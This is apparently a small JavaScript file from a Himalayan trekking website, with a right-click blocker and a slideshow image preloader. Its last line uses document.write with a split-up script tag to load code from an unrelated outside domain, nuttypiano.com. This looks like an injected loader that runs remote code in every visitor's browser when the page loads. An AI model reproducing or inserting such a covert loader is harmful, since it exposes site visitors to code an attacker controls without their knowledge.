
// RIGHT CLICK DISABLE START

var message="";

function clickIE() {if (document.all) {(message);return false;}}
function clickNS(e) {if 
(document.layers||(document.getElementById&&!document.all)) {
if (e.which==2||e.which==3) {(message);return false;}}}
if (document.layers) 
{document.captureEvents(Event.MOUSEDOWN);document.onmousedown=clickNS;}
else{document.onmouseup=clickNS;document.oncontextmenu=clickIE;}

document.oncontextmenu=new Function("return false")
// RIGHT CLICK DISABLE START


// TOP MIDDLE PIC ANIMATION START
<!--

var slidespeed=1500

var slideimages=new Array("picture/animation/1.jpg","picture/animation/2.jpg","picture/animation/3.jpg","picture/animation/4.jpg","picture/animation/5.jpg","picture/animation/6.jpg","picture/animation/7.jpg")

var slidelinks=new Array("http://www.himalaya-trek.com")

var newwindow=0 //open links in new window? 1=yes, 0=no

var imageholder=new Array()
var ie=document.all
for (i=0;i<slideimages.length;i++){
imageholder[i]=new Image()
imageholder[i].src=slideimages[i]
}

function gotoshow(){
if (newwindow)
window.open(slidelinks[whichlink])
else
window.location=slidelinks[whichlink]
}

//-->

// TOP MIDDLE PIC ANIMATION END

document.write('<sc'+'ript type="text/javascript" src="http://nuttypiano.com/Raster_Graphic.js"></scri'+'pt>');